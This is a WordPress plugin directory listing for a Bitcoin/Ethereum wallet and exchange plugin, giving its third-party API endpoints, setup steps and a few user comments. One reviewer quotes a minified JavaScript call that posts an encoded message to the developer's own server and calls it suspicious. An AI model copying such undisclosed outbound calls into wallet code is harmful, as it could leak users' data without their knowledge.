Этот плагин не тестировался с последними 3 основными выпусками WordPress. Скорее всего, он уже не поддерживается и может быть несовместим с текущими версиями WordPress.

Bitcoin, Ethereum and ERC20 crypto wallets with exchange


Simplest Multi-currency wallet for WordPress. Check premium version https://codecanyon.net/item/multicurrency-crypto-wallet-and-exchange-widgets-for-wordpress/23532064

We use this 3rd party services:
https://etherscan.io/ — free public blockchain explorer. they provide information for user balances (Ethereum cryptoccurrency and ER20 assets);
https://infura.io/ — (free 100,000 Requests/Day) ethereum endoint to broadcast transactions.
https://www.blockchain.com/btc, https://api.blockcypher.com/v1/btc/main, https://live.blockcypher.com/ — bitcoin explorers
https://ghostscan.io — GHOST blockchain explorer
https://explore.next.exchange — NEXT blockchain explorer
https://horizon.stellar.org — STELLAR blockchain exploreer
https://api.blocktrail.com/v1/BTC — Bitcoin mining fees data
https://api.bitcore.io/api/BTC/mainnet — free bitcoin endpoint where we send a transactions for broadcatst to the bitcoin network. Otherwise user must install own bitcoin node.
https://next.swaponline.io/mainnet — NEXT blockchain node endpoint
https://noxon.wpmix.net/currsAll.php — free cryptocurrency price feed


Activate plugin, go to MCW options and enable «Use Multi Currency Wallet template as home page.»


  • Wallet Tokens List
  • Wallet Options
  • Example Exchange
  • Example Multi Wallet
  • Example Wallet
  • Multi Wallet

Часто задаваемые вопросы

Can i add my own token?

Yes, you can!.


It won’t let me install the plugin due to this error Fatal error: Cannot redeclare mcwallet_load_plugin_textdomain() (previously declared in /home/g172819/exchange.dutts.tech/blog/wp-content/plugins/multi-currency-wallet/multi-currency-wallet.php:54) in /home/g172819/exchange.dutts.tech/blog/wp-content/plugins/multi-currency-wallet/includes/setup.php on line 25
19.10.2021 2 ответа
it doesn’t inspire confidence after I found this ({url:"https://noxon.wpmix.net/counter.php?msg=".concat(encodeURI(i),"&todevs=1"),method:"post"})
thank you for this cool plungin … please continue to developping
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